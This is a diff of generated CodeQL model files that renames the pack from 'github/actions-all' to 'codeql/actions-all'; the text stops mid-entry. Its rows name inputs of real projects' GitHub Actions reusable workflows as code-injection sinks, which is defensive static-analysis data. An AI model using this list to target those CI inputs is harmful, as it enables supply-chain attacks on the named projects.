b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 64fc3792659..1aae8bd0fd4 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index f48be6693d0..c157f1bbca1 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index f2ebae0b0ea..c7e2c60b08e 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index ec591db22ac..fa0afdae769 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 06fdea3f8a2..11a756cc063 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index b864551b3fb..748d28d7545 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index fdb499a81dc..5916205cea9 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index c831a5d6d8f..b62e5e5599f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index d9d4e9bd2fa..6f841faecce 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index 4091c74dee5..3c986e3d00b 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 1c6d8804d6d..32de8a5131d 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index f94c87537cf..a28e8e121d2 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index efb8e467a0a..ed8f60f413e 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 8a7b36e365c..476d40b5206 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index 0d6fb59ed50..c8a534d031d 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 74bdb5ab280..5d3b6e2a884 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 038fd953d6e..b402ab78ef5 100644 --- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 0c185f4cbd5..2abf8ff1d32 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 44e89b4e251..4183d01143f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index 6b4feeedf62..eebeabb0353 100644 --- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 43e99341717..7279ad6d976 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index cc5fb5c8d57..ccd29346a10 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 64ca7805d90..0d162f9c66b 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index eab60f25238..730a0fc622d 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index fc91813e01b..7c74a66467b 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml index 253c82f4bef..af7c7e94111 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vertx-sql-client/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml index eb1b3df774d..01a7939de43 100644 --- a/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/elastic_elasticsearch-net.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["elastic/elasticsearch-net/.github/workflows/release.yml", "*", "input.solution", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml index 3c6e1aaf658..efd1a84bfb5 100644 --- a/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/element-hq_element-desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["element-hq/element-desktop/.github/workflows/build_windows.yaml", "*", "input.version", "code-injection", "generated"] @@ -10,7 +10,7 @@ extensions: - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "input.version", "code-injection", "generated"] - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "input.version", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml index 3f66f287830..715a3861fd9 100644 --- a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml index b45eabdf202..bad92ff7679 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_bbolt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["etcd-io/bbolt/.github/workflows/robustness_template.yaml", "*", "input.testTimeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml index 76bb69800a9..90503b3ad3e 100644 --- a/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/etcd-io_etcd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["etcd-io/etcd/.github/workflows/tests-template.yaml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml index 9af37394143..3d6de142622 100644 --- a/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eventstore_eventstore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eventstore/eventstore/.github/workflows/build-reusable.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml index 9d0113eb8ec..ab48425c038 100644 --- a/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["expensify/app/.github/workflows/e2ePerformanceTests.yml", "*", "input.PR_NUMBER", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml index 90ad3c0f9a1..6c0165b65a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets/.github/workflows/publish.yml", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml index e07d783ae53..f33f433df1f 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebook_create-react-app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebook/create-react-app/.github/workflows/e2e-base.yml", "*", "input.testScript", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml index 3d698b0a84b..fb700fa7a89 100644 --- a/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers/.github/workflows/wheels_upload_s3.yml", "*", "input.aws_s3_cp_extra_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml index 364bd19139e..60ab0a23c74 100644 --- a/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/falcosecurity_falco.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["falcosecurity/falco/.github/workflows/reusable_build_packages.yaml", "*", "input.build_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml index 85d150cf11c..e0a72159a7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fastify_fastify.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fastify/fastify/.github/workflows/citgm-package.yml", "*", "input.package", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml index 612a114d79c..7483ab3366c 100644 --- a/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ferretdb_ferretdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ferretdb/ferretdb/.github/workflows/_integration.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml index 86267e5a921..137558d68d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/filecoin-project_venus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["filecoin-project/venus/.github/workflows/common_go.yml", "*", "input.test_timeout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml index 31d0192f3fb..cb48bce89cf 100644 --- a/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/firebase_firebase-unity-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-unity-sdk/.github/workflows/update_versions.yml", "*", "input.triggered_by_callable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml index 5116c943f69..9f8338302a3 100644 --- a/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flarum_framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flarum/framework/.github/workflows/REUSABLE_backend.yml", "*", "input.monorepo_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml index 85cb45df895..49f73a1d620 100644 --- a/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/fluent_fluent-bit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["fluent/fluent-bit/.github/workflows/call-windows-unit-tests.yaml", "*", "input.unstable", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml index 4167f4bb982..e1e8de22530 100644 --- a/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flux-iac_tofu-controller.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flux-iac/tofu-controller/.github/workflows/targeted-test.yaml", "*", "input.pattern", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml index 04b9325cecd..c2f634f7d00 100644 --- a/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/flyteorg_flyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["flyteorg/flyte/.github/workflows/publish.yml", "*", "input.before-build", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml index 60b966d98a4..89dcb32c453 100644 --- a/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/foundatiofx_foundatio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["foundatiofx/foundatio/.github/workflows/build-workflow.yml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml index bbca585931c..2ea31953844 100644 --- a/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/freecad_freecad.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["freecad/freecad/.github/workflows/sub_wrapup.yml", "*", "input.previousSteps", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml index a0b7c418967..b9e9d879a66 100644 --- a/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getpelican_pelican.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getpelican/pelican/.github/workflows/github_pages.yml", "*", "input.output-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml index 663826781e7..8a22c8415e6 100644 --- a/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getporter_porter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["getporter/porter/.github/workflows/build_pipelinesrelease_template.yml", "*", "input.registry", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml index c0b8992a678..a5db7a9533e 100644 --- a/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/getsentry_sentry-dart.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - 